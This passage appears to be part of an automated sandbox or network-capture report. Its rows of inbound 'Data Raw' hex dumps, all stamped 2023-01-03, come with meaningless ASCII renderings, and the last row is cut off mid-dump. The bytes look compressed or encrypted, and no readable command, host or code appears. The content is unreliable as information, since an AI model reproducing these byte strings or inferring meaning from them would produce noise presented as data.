2023-01-03 15:29:20 UTC	815	IN	Data Raw: 78 26 80 aa 6b aa d9 64 5c 33 4d 11 f3 98 aa b1 0d e1 34 67 dd d9 62 b0 6a 56 21 58 42 bb e9 34 e3 86 98 cf 14 d5 3b 72 04 7e f6 fe 54 4f a8 7f 72 b9 03 9f aa ad 66 bb 41 b7 6d 8b 18 97 22 21 93 a2 3f 48 8c 68 85 57 60 45 19 5d 83 49 8c 70 94 fe f6 44 18 23 da 15 e9 c7 88 a4 22 83 31 62 0c 91 69 fe 7e 8b 1a a8 55 64 66 f1 65 1a a0 29 31 ae 93 01 88 59 48 09 e6 46 04 03 82 fa 8f e3 d7 81 c3 cf b5 17 43 7b 44 6f 68 2d 94 2d d7 80 6c b7 0c cb 76 ea a9 11 bb 7e 5c ef c9 5b 73 ca f2 70 39 e6 8d 40 1c c7 96 b0 3e c0 d2 8c ed a0 de 62 49 4b 24 f1 66 4f df 19 71 b1 a0 60 0f 68 f7 6a e5 27 b6 60 98 58 d2 03 49 c2 94 b2 68 72 c4 ff d3 25 e6 2c 58 7d 63 b7 95 af 15 1b 9d 7d 6d 10 d3 ac 58 a8 01 17 22 ef 6c b2 60 5f b3 64 35 0f 3f 5d f6 f7 13 12 18 62 c3 fc e0 ee 8a Data Ascii: x&kd\3M4gbjV!XB4;r~TOrfAm"!?HhW`E]IpD#"1bi~Udfe)1YHFC{Doh--lv~\[sp9@>bIK$fOq`hj'`XIhr%,X}c}mX"l`_d5?]b
2023-01-03 15:29:20 UTC	817	IN	Data Raw: f0 b5 55 ff d9 d8 a5 2f 9a 97 0c c1 e3 cc c4 33 6b 37 e0 11 07 b2 9c ab 8b 90 71 0c e8 3b dc 35 ac 34 ce c7 b7 10 b0 45 02 2e 72 93 40 50 fc 32 3f 7b 3a d4 2d fd 58 45 41 33 ef e1 a0 99 35 94 89 c9 f5 2c 48 5f de a2 03 cc 4b f6 39 cf 77 0d 13 53 69 09 07 02 bd 9a 22 b2 23 44 16 8d 6d 37 c0 db f8 90 c1 34 da f4 7e 1d da f4 36 8a ec 06 99 85 16 96 6d 73 86 9c 48 33 3b 3d 18 e8 83 3a 18 e8 52 8a 2e 5f 87 05 c2 f3 15 67 03 fe e3 a2 ef 3f 53 0d d9 71 aa ce 8e 57 b9 38 c5 d9 71 e5 c4 b1 c9 d6 90 30 a5 be 3b 1c 76 6d 6b 6f 01 9b 4f f5 88 00 f0 5f f1 17 f8 64 d6 45 e2 7e ac 06 ef 31 5b 63 49 b2 a4 c4 b0 f8 6d b8 97 df 1c 71 09 d6 d4 9b 88 91 1c ee 64 4c 0c 52 2b f0 e2 11 66 95 ee 1c 8a e0 76 55 f4 77 2a 05 78 a5 cf c8 86 07 e7 43 cd 10 d8 26 55 44 83 4f c9 cc 1d Data Ascii: U/3k7q;54E.r@P2?{:-XEA35,H_K9wSi"#Dm74~6msH3;=:R._g?SqW8q0;vmkoO_dE~1[cImqdLR+fvUw*xC&UDO
2023-01-03 15:29:20 UTC	826	IN	Data Raw: 36 6c b3 0a f9 ce 94 38 19 ad 2d 68 70 43 dd 51 16 f6 39 0a bb 11 cc 43 8b 2f 28 d3 bd 1b ce 23 e6 47 83 e0 99 fd 9c 36 4c 5f 07 8b 5d 8b 63 a1 fb 6c 13 93 eb 2d 4c d5 7b 0a 4a f5 86 f8 2b 7c b8 b8 30 ce 93 4f d2 4e 7f 84 ae 92 d8 dc 17 8a e6 5a 78 58 0c ed 4f bb e5 cf 79 2a 4a 40 aa e3 3d 0a 5f 73 90 2a fe 2a af 56 57 18 3a d2 3b 93 4e 9b 47 32 21 61 6d 90 5a 9a 94 fa 72 e6 73 1c 96 ba 7d ad 10 eb 2b a7 f1 70 47 d3 4e f7 59 47 65 a7 fb 69 5c 3b 0c a1 c9 9a d0 64 65 94 5f 6d a8 b9 28 b7 88 53 6c 6b e8 84 9c 4c c5 df f8 6b 68 10 ba f1 c1 64 51 0e 56 db e8 d4 02 64 c6 b6 1c ea 53 0e 51 ea 75 ab 50 3e 31 4a bc 59 f8 d6 a3 af 3b 83 7a f4 f2 ed cc ca 41 29 43 56 8c 0d 12 ca 14 40 10 e3 9d bd 59 e1 e2 f6 9d e2 29 69 31 a9 92 a6 a2 e1 c5 75 1c f5 29 fc a8 93 5d Data Ascii: 6l8-hpCQ9C/(#G6L_]cl-L{J+\|0ONZxXOyJ@=_s*VW:;NG2!amZrs}+pGNYGei\;de_m(SlkLkhdQVdSQuP>1JY;zA)CV@Y)i1u)]
2023-01-03 15:29:20 UTC	842	IN	Data Raw: 00 39 ae 24 72 e2 18 09 fe a5 b0 a6 92 65 ca 6b c0 c7 b7 08 b3 76 e4 31 fb c4 a3 e5 03 d5 c7 e5 e1 3c 8b 24 90 5a 7a 86 c4 6d f2 6a a1 3b 91 54 91 51 74 c4 24 49 9f 76 c9 f4 29 59 be 4f 9b 7f d3 c9 ec 1b e4 f7 67 32 fb 43 d3 6f c9 22 ce e7 95 5a 66 5e 5b d4 94 d7 16 f5 68 34 57 64 a2 66 eb 48 b3 d1 6f 8a 7a 05 53 8e 6d 65 62 30 e4 17 2d 86 e4 a8 10 f4 89 ed 4f c1 df 62 81 e7 99 7d 00 f5 37 db 96 e5 fe 5b 49 9f ac 9f 64 f4 c8 9f 64 fb 74 1f b7 50 df d4 6b 9c f5 17 dd 35 b0 d2 92 09 ee 7b 92 4a 93 64 2a dd 27 5f e9 28 dc f3 33 54 d1 de 83 fd 53 9f 31 37 23 b9 c9 90 35 f1 0e 59 6e ce 73 45 d2 c5 da 08 99 ad e4 80 eb 10 36 e9 32 93 d0 29 4e 65 f6 4d 5d 51 02 78 8d d1 1b 09 74 30 aa d4 30 9f 83 d9 cc ab d4 82 e0 42 fc 89 84 ff bb d3 ff 6f 6a 36 f4 51 16 ab da Data Ascii: 9$rekv1<$Zzmj;TQt$Iv)YOg2Co"Zf^[h4WdfHozSmeb0-Ob}7[IddtPk5{Jd*'_(3TS17#5YnsE62)NeM]Qxt00Boj6Q
2023-01-03 15:29:20 UTC	843	IN	Data Raw: 0b 03 32 6e bf 93 fd 09 d4 3c 79 7e 80 c3 e5 76 db a1 c3 6e fd 13 18 d9 e9 57 49 ce e9 c2 c8 8c 9a bf 5e f3 36 24 a3 3e 9d 60 34 80 7c ef 20 df 09 18 2b 85 3c ff 44 3e d1 18 c1 42 c9 67 31 98 27 48 be 1f bc d7 bc 89 b8 29 0d 0d ab 9e 17 e6 9c fd 2e b6 1b b7 f8 a8 f4 d6 69 d4 11 45 83 2e c1 43 be ca 64 05 29 db e1 f9 78 38 30 a1 eb 41 31 a0 49 6d ed 45 4f 54 1a 0c 38 30 47 02 a7 c2 10 26 1b 98 87 16 1d f8 7f ee 93 9f 5f 30 f4 04 4c c7 99 f5 7c c6 3b 7d 6a 0e 9e d6 0d 92 e8 a2 7b fe c2 22 c6 83 d1 ac f1 1c fb 2a e3 bb fb 4d 76 a2 0c c2 b5 ff d6 8d 94 5f 90 be 53 2c 93 94 df 78 db 83 23 aa c1 b0 eb f0 4d 72 98 c2 85 9f 9e 15 d5 5e 59 6e e0 dc 27 d4 40 75 77 8b 47 d3 24 e8 14 fa 26 23 c8 cb a3 f3 f9 37 ba 53 40 91 8d ab 44 ea 64 db 5d b4 44 52 ff 31 d4 31 c1 Data Ascii: 2n<y~vnWI^6$>`4\| +<D>Bg1'H).iE.Cd)x80A1ImEOT80G&_0L\|;}j{"*Mv_S,x#Mr^Yn'@uwG$&#7S@Dd]DR11
2023-01-03 15:29:20 UTC	858	IN	Data Raw: 22 38 cf 16 09 4c 1b 84 31 15 5b 18 09 cd 5f 16 28 20 86 c9 a0 d5 27 15 4c e5 d4 d0 50 eb 7c 81 24 19 38 cf 19 49 2d 59 b1 16 6b c3 9b 95 21 6f 8b bd e9 c5 b5 44 8a 58 2b 92 f3 3c 91 00 be c0 dc 5c fa 54 6f c9 b9 c3 3a d1 ac 4f 67 cd 6b b6 4b a8 98 2c 43 c5 d2 b9 65 a9 38 f9 07 4d 2a 7a 8a af 73 71 ba f0 fe 54 dc 58 1c 1e 27 a9 b3 7e ee b4 75 4e 93 af b3 cc 0f b1 4b 75 f4 8e 30 7a e2 a9 61 7e 9f 9d d9 53 22 d0 00 b5 5e d6 90 ee 30 2e 5b 71 26 66 41 3a 11 21 d2 71 9e 55 b9 59 42 dc 47 09 23 a8 62 ae fe a0 bd 74 a1 a1 18 30 b3 46 9f 54 58 cc 92 99 39 cf 3e 09 34 4a 43 30 a6 fd c4 d7 50 ad 52 be 30 31 74 a8 59 2f 04 a8 32 9a 8d a1 66 cd 02 b3 91 3a d7 58 f4 a4 a6 50 ce 73 45 52 93 03 6b 0a 3f d0 e2 33 d4 bf 73 92 71 53 37 f3 3c 44 76 fe 17 12 98 28 84 29 1e Data Ascii: "8L1[_( 'LP\|$8I-Yk!oDX+<\To:OgkK,Ce8M*zsqTX'~uNKu0za~S"^0.[q&fA:!qUYBG#bt0FTX9>4JC0PR01tY/2f:XPsERk?3sqS7<Dv()
2023-01-03 15:29:20 UTC	874	IN	Data Raw: 5e 87 eb 63 ab 71 6e 4d 2b 75 c0 11 17 a0 5a 31 79 87 98 7f d2 b8 d4 af e0 13 78 39 a6 26 b7 b9 34 54 9d 80 9b 62 73 d2 10 ca e4 b3 02 df 9a f8 a0 1a bd aa 42 d1 d4 20 2e 30 dc 19 83 af a9 95 82 9d 61 f2 03 01 2b 44 d8 b3 98 b3 59 b0 33 7c 15 17 6a 2a 48 eb ed 55 ef 24 08 a7 8c 02 7a ff 0a ed b9 ec 16 ee 06 e3 b2 1d 3f e8 d1 13 aa b5 68 03 c5 09 ec a7 db f0 e8 2f 84 3a 2d ad fd 0e 7e ec 9c c2 05 4f 68 ad 16 98 ad 9f 6e cd e4 62 02 db 9b d8 6e 1b 5f e5 85 15 5f 17 d5 d6 b3 71 2a fb ef de 9d 38 26 d7 11 e0 f2 04 3f 3e 7a c2 1e ae c4 66 74 d5 c3 2e 9a 95 45 d8 5e 1d 8e 16 d0 d7 97 11 1d 39 ab 9b 1d 9c 5a 97 c5 55 d0 78 6d 35 3b 9c 5f e4 1c cf e4 24 41 63 03 69 0c d8 5d 6c 13 74 7a 5e 99 f3 cc 4a a9 1d 15 34 a2 de e6 ac b0 69 ab 14 4e 1b 05 a5 24 52 2a 77 aa Data Ascii: ^cqnM+uZ1yx9&4TbsB .0a+DY3\|jHU$z?h/:-~Ohnbn__q8&?>zft.E^9ZUxm5;_$Aci]ltz^J4iN$R*w
2023-01-03 15:29:20 UTC	875	IN	Data Raw: 21 fd b5 c1 60 2e 93 1f 08 b0 2f c1 0f ab 1d 78 0d fb 7a bc e4 b6 71 35 53 93 60 6d 9e 53 fa cd 98 fc 5e e0 af 9c a1 e8 55 9f 3e 2f 86 fd f7 ed b9 e7 87 63 d5 79 84 ad 95 8e 65 b2 bb 85 67 e7 12 5b e0 5c b5 79 90 99 37 a5 a0 9e 1d 63 63 d5 56 3a 86 c9 45 04 b6 03 b1 4f 1f 3f 74 83 47 23 1a 94 d4 b3 fd d5 4e 33 d8 55 cb 74 7f 26 d7 10 e0 c2 04 ff d2 dc 7d 33 e4 1b bd 82 83 1b a8 23 a0 b5 59 4e a6 1b a0 4b 24 f0 77 4f d3 8e c1 ea b7 42 c1 f8 e9 01 b7 55 ef 90 ad 6b 52 1d cf 43 4c ee 2e b0 3f 13 1b 1b 5a 2b 08 36 15 e9 34 5b cf 96 55 07 0d fd 52 60 59 74 80 04 3e 91 f8 5a e1 6c 18 6c 7d 60 e1 b6 9e e5 d7 0c b7 b9 62 b8 f9 99 3c 53 40 4b 11 fa ea d2 9c 6c 48 b9 b2 89 73 02 b3 b4 2e 7e 34 f9 4e 9c c7 9e c5 e4 35 82 cc fd 53 28 b3 72 62 e1 6d d0 ec b7 86 9c 43 Data Ascii: !`./xzq5S`mS^U>/cyeg[\y7ccV:EO?tG#N3Ut&}3#YNK$wOBUkRCL.?Z+64[UR`Yt>Zll}`b<S@KlHs.~4N5S(rbmC
2023-01-03 15:29:20 UTC	887	IN	Data Raw: 28 72 88 e2 43 95 ba 49 90 71 2e 84 69 c8 9a 1a cb 65 be 0c 94 88 8a 23 68 2f f9 2a bf 5f 1f 04 55 bd 3b 31 be b3 a9 1a cb 8c bc 65 48 c5 1d 18 47 51 90 28 1e 36 af e0 03 d5 e6 9c 64 dc 9d 5b 68 2c d9 7c 19 5a 88 e6 4c 8e e0 2c 59 a1 1b 3f 9e fe 3b 3c 5c b8 8e f1 09 2b ae b1 9c cd 15 2f e7 ac e2 05 69 8a e3 06 87 a3 19 4b 34 6f 7c d7 57 87 de 5e c9 8c a7 95 49 63 79 9d 4b f3 4a 45 63 12 cd 2b 38 9a 7a 44 f3 78 f1 c0 fe f0 57 ea 5a c6 43 b7 95 c6 b2 2f 97 66 af 8a a6 95 68 de c9 d1 7c 25 9b 72 b7 52 83 ef c2 8a 7b 2b 19 ef a4 82 8c cc dc a2 a2 29 88 fb 11 8e 66 0b d1 e4 b4 7c ed 0b c9 77 5e da ab 69 fa 69 2c f3 f9 c6 ed 27 9a 1f 71 04 69 44 10 d8 28 43 80 c0 d8 ca 4c 4a 81 1e 1a cb 4b 1b 7e 92 2f f3 f8 49 ba f8 f4 10 cd 5f 39 de 50 e2 1d 3d a7 e3 3e a8 36 Data Ascii: (rCIq.ie#h/*_U;1eHGQ(6d[h,\|ZL,Y?;<\+/iK4o\|W^IcyKJEc+8zDxWZC/fh\|%rR{+)f\|w^ii,'qiD(CLJK~/I_9P=>6
2023-01-03 15:29:20 UTC	896	IN	Data Raw: cd be b2 c5 03 5a 28 c3 ae 6c 6b e5 ff 63 bf a5 4d f8 ab c5 51 7f 9d d8 72 ad c5 01 80 68 0f cb 00 51 e5 fc 92 f5 d3 a0 bb ff 55 e2 57 52 9d 25 67 c1 ce 38 d8 d9 4e 09 34 02 9b e3 e4 6b af bb 83 cd 8f 2d 7f 53 33 e8 31 09 2c 3e 56 9c c2 8a 2a b6 7e d2 f6 7c 02 23 33 eb 3f b5 13 2c e8 8b b1 c8 7d b2 a3 da 99 f3 ad b5 d7 b8 82 9e 5e 1e 51 a9 4a 59 72 df 4d 67 5c fd fb 16 85 8d c5 d8 51 af 37 57 c1 fd 65 e3 38 54 c4 9b 27 81 45 21 ef 4b 0a 3b 11 1b a9 bc 16 5e ed 6a c8 e9 f5 c6 db 98 5a e6 83 e2 36 ae ca 6e e5 2a 63 fb 1b d8 34 19 95 75 e3 55 41 c3 f3 db 7c 70 5f f8 92 e1 b3 a0 47 6d f3 4c 51 10 97 6e 3b a7 18 6e ae 57 6b e2 70 65 d0 10 4e 2a 0e 13 d3 0f 3e f6 60 11 3e 33 13 fd 5f 45 d0 d0 13 ad d1 bb a0 fa 79 83 6e 3b 9c d0 44 49 e1 8f 47 3e 71 9b fe 4e f0 Data Ascii: Z(lkcMQrhQUWR%g8N4k-S31,>V~\|#3?,}^QJYrMg\Q7We8T'E!K;^jZ6nc4uUA\|p_GmLQn;nWkpeN*>`>3_Eyn;DIG>qN
2023-01-03 15:29:20 UTC	912	IN	Data Raw: 41 87 0e 82 d7 78 2a d0 c9 0c dd db a4 6c 2d da 98 3c cf 65 09 da 5f c4 46 b7 14 94 dc a4 e8 58 7f 94 a2 81 42 55 85 a9 66 b9 3b e7 a4 99 59 8e b5 90 a8 9e 1a f5 5b 5f dc b2 28 11 ee 29 74 a0 93 c2 f3 f5 06 b7 b1 a5 6b 3b 0a 6d 67 91 36 fc ef 17 11 5a 8f 15 fb cd 96 00 05 7a 80 a1 b9 1e 84 95 26 e7 65 bd a4 57 4b 06 88 9e fd 66 eb d9 01 48 a0 14 e8 68 86 5e 1a 97 bc 3e 75 de 76 a4 98 54 fa 72 4e fa 2e c3 3f e2 73 39 b4 c2 5a 85 a7 1c f3 e4 77 2a 5f 83 f2 0f 0b b7 ca e1 ca a8 ef 7d b6 5e 70 48 9d 0c 1c 11 14 8e cf d7 f9 b1 db 2c 35 7c a9 74 d7 fb 75 25 8e cc 46 7d cb b7 90 91 b5 0e 32 92 19 4c 57 14 a6 f5 cc 54 78 c1 9c 4f 14 a5 8d eb 2e 31 3d 10 7d 62 fd a1 8f a4 8a fc 31 92 7a c0 b9 94 42 d8 9a 09 af 6c 9c 99 9f 96 5f bd de 5b 22 ac 6a d2 37 8d 66 e8 3d Data Ascii: Axl-<e_FXBUf;Y[_()tk;mg6Zz&eWKfHh^>uvTrN.?s9Zw_}^pH,5\|tu%F}2LWTxO.1=}b1zBl_["j7f=
2023-01-03 15:29:20 UTC	913	IN	Data Raw: f3 45 4d fa 89 09 7b 33 16 c5 a7 03 14 fc d9 0b fc 20 79 8f b5 1d 68 7c db f9 a9 25 7c 25 21 bf d6 bb 0e 22 51 09 5d 11 ac 70 8c 67 0e 0f 97 a4 c9 a9 4c ae 83 43 25 8e e2 68 c6 20 c7 91 5b 71 34 e1 4a 05 5f 93 f1 e9 66 94 5e 4d fe ad a6 4a 4f 22 6e 12 ef d1 96 b2 55 7f 93 d9 b2 43 81 26 63 e8 ce e5 3e 03 e9 42 f5 b5 8d a5 4f bf 37 e8 47 fb c8 9d 34 ad 77 7d fd f3 ef f1 f9 08 85 e3 d4 79 be 40 e1 f8 b7 11 34 37 f3 7c d9 92 86 8b c9 7c 67 eb ae bf fa f6 70 d0 3d 52 e8 86 30 dd 80 26 5e 39 a8 65 c6 23 2d 25 ba 34 a0 db cc 45 5a ce 53 69 d9 d4 d1 7d 1a b0 7d 51 d8 f2 33 db f6 e7 43 8b 50 89 8a dd fb 4a 6c fb 0d fa bc de 3f 06 72 fb c1 e6 b2 5e 66 bb fd 1f 0f 7d 5a de b9 47 43 53 a5 49 25 b1 4d 36 3a 1e ca 03 7e 32 7a da 5d c1 2f 62 7c ca 16 b7 f7 d1 99 43 97 Data Ascii: EM{3 yh\|%\|%!"Q]pgLC%h [q4J_f^MJO"nUC&c>BO7G4w}y@47\|\|gp=R0&^9e#-%4EZSi}}Q3CPJl?r^f}ZGCSI%M6:~2z]/b\|C
2023-01-03 15:29:20 UTC	928	IN	Data Raw: 1a 14 7e 50 6b b6 31 d2 50 24 79 56 3b f0 07 dc 56 fb d0 58 b5 24 13 79 4e 90 6b 3a 49 0c c6 61 26 77 44 f9 cb 91 09 35 e0 61 d9 aa 5e 44 6e 47 43 31 4a 15 d3 c4 0e ad 28 46 4a ff 12 db ec 04 99 77 02 fb c3 16 b4 39 de 33 69 3d 98 6a df 7f d6 ae 7c 26 46 e8 3e c3 2d 40 5c e1 ef 1d da 43 68 0b 37 fa 8d 7a 2a 2b 08 68 2f 2b 4e 2d 4f c5 5b 7a c5 18 5e c8 e8 56 e1 62 0f 63 ba ad a4 3b 78 a0 f8 73 e5 4a 2f 5c a0 f8 4b 96 77 a9 be a2 1b 5e 70 bb 3f b5 83 82 d1 7f 93 c2 83 16 d2 2a 4b a8 fc 78 58 a8 35 5f 30 69 0a 4a f3 cb a3 9b c2 ee f8 71 b4 f8 cf 7b 99 b1 4a 4c 86 f7 62 e1 75 62 0c 2d 32 fa 3d 32 8d 85 b1 65 e5 ac 01 b4 3c 73 68 73 15 43 30 02 4b e0 33 46 57 64 ac 58 bc da 14 aa c7 7f 4b dd ee e6 fa e8 bb 00 16 20 63 8e 65 f0 19 a7 a4 2b 56 40 3c df be 1f cc Data Ascii: ~Pk1P$yV;VX$yNk:Ia&wD5a^DnGC1J(FJw93i=j\|&F>-@\Ch7z+h/+N-O[z^Vbc;xsJ/\Kw^p?KxX5_0iJq{JLbub-2=2e<shsC0K3FWdXK ce+V@<
2023-01-03 15:29:20 UTC	944	IN	Data Raw: a0 63 f2 b0 ce 50 e0 d0 9c 62 9a 04 75 70 24 a8 37 9b a0 a8 e1 91 9a b4 44 28 69 f9 fb 2d 02 07 f0 9e 99 45 fc e6 c3 65 c9 c5 71 d1 2e 1c 9f d4 06 53 12 f3 35 00 c7 a2 b3 6b d5 4e 31 79 f2 9e 90 fb 45 d7 e2 b0 e2 f8 c1 27 66 1b 3c 6f 1a 35 14 8e df 3e f9 08 2a bc 3a e4 63 c5 ba 7b ba bc f9 3e 04 5e 7c 79 ce 02 8d 93 46 89 70 3d e4 ec 01 8b 19 fa f5 4d ce 0d 3d 07 f9 ee 35 c3 43 77 c3 2e 9b c5 6c 01 cb c8 d0 1c a2 19 ba 3c c5 0a de 61 5a a3 b3 70 38 7d f3 ea a2 d5 66 b3 da a1 f8 e2 75 ad e0 75 fb 61 3f 45 9b 35 dc e4 01 6f 51 48 27 8a a1 cf 5b 82 39 ae 34 2a 39 c5 97 e3 fa 79 72 5c 3b fc fb bb 3b c7 ed c9 8c 85 3d 8c e3 5e 61 02 07 e8 39 6e b4 09 95 18 c0 c9 dd fe 1d fc be 32 90 e3 16 66 e1 38 d1 83 e3 ae e1 b3 05 bf db f0 b9 92 8d e3 2a f3 1c 47 9d f1 f2 Data Ascii: cPbup$7D(i-Eeq.S5kN1yE'f<o5>:c{>^\|yFp=M=5Cw.l<aZp8}fuua?E5oQH'[949yr\;;=^a9n2f8*G
2023-01-03 15:29:20 UTC	945	IN	Data Raw: 48 9d ae df 55 2b 17 42 4b 0c e1 dd 83 f3 18 c1 e7 74 70 b7 f0 28 7f 98 75 77 9f ca 6f 42 78 0e de 43 4a a6 d8 63 e8 d3 9f ef 52 69 7f fc 26 30 df 70 04 26 98 7e d0 bd 98 2d b7 1c 83 b5 f5 e2 d4 ee 6b 4c 05 79 83 c9 88 b2 16 14 a5 06 fe 6c e2 ef 7c c7 24 76 60 3e 9a 02 c1 7c 61 f1 2a 25 89 e9 90 2d 50 e4 d3 59 85 4d 48 99 54 4f 4e 48 c4 ea c9 d9 55 09 99 41 21 4b e4 90 c0 48 b3 6a 21 41 e8 4f e8 03 59 f4 99 d0 39 f2 91 a7 82 3e 0b d1 67 8a fc 2c cc 7f a4 e4 f5 40 23 9d 66 d1 46 68 71 f8 49 1e d2 48 ff 4a 0f de 68 34 32 c5 3f ad 46 ae 39 d7 88 0b 09 36 5b 16 2c ac 4c 0e d5 e6 9b f0 f4 1b 0a f6 86 15 ec 21 b4 c9 df 20 b7 22 d8 23 14 ec a1 c8 3f b2 0a bb 91 32 49 94 31 f8 72 dd 54 eb 9c c2 42 0a 99 24 87 7c e7 f7 a8 4e 55 0b 23 30 04 86 ae 3a d7 1a 3a 75 bf Data Ascii: HU+BKtp(uwoBxCJcRi&0p&~-kLyl\|$v`>\|a*%-PYMHTONHUA!KHj!AOY9>g,@#fFhqIHJh42?F96[,L! "#?2I1rTB$\|NU#0::u
2023-01-03 15:29:20 UTC	949	IN	Data Raw: 38 ff 45 ca a4 59 32 c6 f4 99 55 d4 6b bf ab 09 a3 06 8b 91 03 3c da 58 3f 2a 18 39 11 23 87 c8 e7 c4 f4 13 65 2b 96 f2 38 9c ba d7 3f 48 a1 3c 81 94 c7 45 fe 84 55 b0 50 6c 55 e5 d8 8e dc 5c a6 9e 84 95 22 8c be 2c 46 05 c8 9e fd e0 28 05 a3 22 62 54 10 f9 8a 56 21 1d 61 f4 92 31 1a 5d f6 88 55 61 fc bc 49 cb 1b 2c 46 1f f8 70 24 8f 43 e2 be 88 d1 47 e4 fb 5a 85 f3 48 99 d4 49 c6 b8 5f f2 a1 7a b9 6b 2b 61 2c 63 31 62 e0 5e 84 ff 07 05 23 16 31 62 44 3e d6 2a 8c 21 8c 19 32 c6 f0 cc 23 d5 8d 45 c2 4d 79 3c 5a d0 08 eb ef 15 f9 46 c5 81 c6 a5 4c 71 a8 45 d1 ec 61 a3 b9 09 e5 fb bc 1a a4 44 73 0b a3 b9 29 f2 b7 ac 42 0e a2 bc c4 52 ee 85 67 d7 02 b7 29 94 fb 90 72 af c8 ef b3 0a bf 6e a0 40 cd 64 81 e2 03 42 d5 bb d3 0f 28 a4 8f 32 82 b4 2d 54 79 17 16 8e Data Ascii: 8EY2Uk<X?9#e+8?H<EUPlU\",F("bTV!a1]UaI,Fp$CGZHI_zk+a,c1b^#1bD>!2#EMy<ZFLqEaDs)BRg)rn@dB(2-Ty
2023-01-03 15:29:20 UTC	958	IN	Data Raw: ae cf 03 98 9b 44 02 5d dd e2 ea e8 a9 e5 28 ae 81 dd 4a 3c bd c6 ed eb 00 cf 6c 7c 45 a6 1a bb ba 55 ae ab a7 4a 5c 4f c3 33 48 ee 4f d6 79 0e 01 5b e3 1f 35 98 cc cd 7c d1 ec cf 51 de b6 d1 f0 d4 24 9e 7b 6d 37 c6 42 f9 99 85 6a 30 75 d3 8d 98 5c e4 ad ba fe 1a ae f4 c4 95 12 9f 2d 05 44 38 c3 48 e7 a5 cb dc ce e2 ef 2a ef 8e 4d d1 70 3d a4 3e e1 44 97 d1 1f c1 b2 7c 32 b3 ec ef e1 10 90 1a b4 55 1a ae d5 64 59 11 d4 2e 8f 11 36 4e 3c 9d 8f 14 3c 7b f9 8b ce 8c 82 69 0b 4b 97 99 f2 60 7e c7 cc 4d 88 e4 a8 77 9f 8c 6a 12 bd 74 a8 90 93 23 b0 85 9d f6 5d c5 48 ce f9 c7 1b 34 82 cb 1d ee 33 9b 88 01 6e 21 8a 4e 70 04 91 b1 30 2b a7 3b 09 91 a1 1d 0e 11 bb 59 86 6c 24 21 4a 67 78 cb 5a 94 3e a0 f6 7c 52 d4 92 cd 10 bd ca ce dc 18 6e d2 85 28 6a c3 86 36 9f Data Ascii: D](J<l\|EUJ\O3HOy[5\|Q${m7Bj0u\-D8H*Mp=>D\|2UdY.6N<<{iK`~Mwjt#]H43n!Np0+;Yl$!JgxZ>\|Rn(j6
2023-01-03 15:29:20 UTC	974	IN	Data Raw: 5f 25 e4 1f 1d a0 74 0f ff d1 94 18 bf b9 e1 db 1f e3 2e 87 95 65 2a 79 de c2 ea b0 1f 7f 37 c3 df ab 90 ee b9 bb e2 58 a8 29 1d 0a c0 b8 af e1 df 79 31 fd 36 83 72 77 ed 3d a4 05 17 e5 00 03 d5 2f 11 f5 92 19 d3 d4 00 69 06 e0 df 65 50 c6 36 28 db 35 94 f7 23 ca f9 15 bf 45 63 3a d7 60 f8 71 fc 5d 0d 31 ae 63 fa 4a 21 f3 3d 8c ef 00 5d 6e 80 72 d6 47 0c 01 c3 a3 51 de 0b 28 cb 20 7c 5c 31 4d f7 f0 f7 65 7c c7 23 5f 0e a4 6d 8f f8 8f 30 fe 7e c8 ff 15 bf af c1 78 16 62 d8 77 d4 7f 2b fc fd 0b e3 69 81 38 09 f8 5b 38 83 0a e1 fd b0 d3 c2 0a 22 5b c6 6e 6a 5c 47 f6 05 73 f6 42 04 6b 2c 92 5e f2 6c 93 b6 8e 54 6b e3 b4 8e 94 a6 9d b4 e5 4f 8c e3 a1 c3 ab bd 8c 01 7d 37 de c3 61 0a 10 c4 a7 e7 bb 89 52 ab 36 6c dd a0 96 12 0e 9c f9 71 12 ba af 4a 60 fa df 28 Data Ascii: _%t.e*y7X)y16rw=/ieP6(5#Ec:`q]1cJ!=]nrGQ( \|\1Me\|#_m0~xbw+i8[8"[nj\GsBk,^lTkO}7aR6lqJ`(
2023-01-03 15:29:20 UTC	975	IN	Data Raw: d5 b9 24 61 11 21 5f 36 76 6c 00 b5 6c 95 1e a8 91 33 f1 21 63 db a2 d2 c9 d2 22 56 03 da 89 b8 ce cc bb da 13 c4 36 6e 8c d5 75 b8 6c a6 66 44 b6 70 9c a0 69 d8 8a 12 db b3 75 73 66 43 87 ef 12 53 47 4a f0 1e 19 1c c9 2f 21 4a 76 0d 5f 0a 19 bb 6f 88 7b 9b 03 9a 7e cc a8 be 65 cd 24 3a 8e 51 58 70 9e 92 9e 17 45 29 49 c3 7a e8 33 b5 f9 72 ea f9 74 ed cc c1 ed cc 7c ba 30 3f 8b 32 3f 6f 67 f6 d5 91 eb 83 16 53 a2 3a 52 29 f0 ab e0 3e 53 53 e2 26 b6 77 72 c2 b8 bd d3 12 67 f9 2c df 0b ea 95 a1 c5 85 3a 60 3e f4 ab 97 3a ff 29 0c 23 ce 6b 04 db d4 f5 72 d7 93 71 63 20 e3 9b 5e 48 4f 34 81 38 b1 cb d8 22 7c 1e 51 9c 6f 39 d4 4f 23 ce 0b 27 e2 44 77 70 2a ce 09 b2 8c 3f 5c e4 e4 5a 58 dc b6 00 e3 dd a9 5d 90 3c dc 68 27 4a e5 3b b0 da 9a 42 4e 80 1c 05 8a f7 Data Ascii: $a!_6vll3!c"V6nulfDpiusfCSGJ/!Jv_o{~e$:QXpE)Iz3rt\|0?2?ogS:R)>SS&wrg,:`>:)#krqc ^HO48"\|Qo9O#'Dwp*?\ZX]<h'J;BN
2023-01-03 15:29:20 UTC	990	IN	Data Raw: de ae 55 ff a5 a6 31 6c a8 69 5c 46 f9 3f 65 2e ab f0 fe 5d 43 29 19 0c 74 b3 68 0d 9e 07 1f c5 c8 28 a8 d1 1f 1b 01 b7 8a 74 4d 29 a9 48 22 6d 42 26 8f e1 ab 05 29 a9 61 f1 90 ae df d7 a9 19 99 f4 e0 cd 30 58 49 26 77 86 a6 68 7e f5 ec 84 be ba 71 8a 5d 40 91 e2 d9 d2 ff 76 54 ac 0d 20 a5 4b 6e 50 3a ff 81 de 4e 60 ae e6 9e d4 a4 92 cc e1 4d d9 1b 4d b9 d3 19 f1 5d a8 ee 7e ee 1e 49 11 96 89 09 0b c2 3b 26 7d 74 81 92 f4 83 ed 85 15 72 87 98 b0 20 6c 54 36 f8 09 b8 5c 3d f1 97 b0 66 a5 8a 09 32 d9 d6 78 e4 2d 28 6f 61 fc 80 a8 ac d7 78 43 d6 a3 21 1d 77 6c 5e 02 eb 82 02 57 08 28 ff 43 de 20 0f a4 74 d7 98 2a e6 fa f4 fd 3e 5f 7d d6 9a eb 2e a1 d7 49 0a c1 62 c5 4a 45 7c ee 32 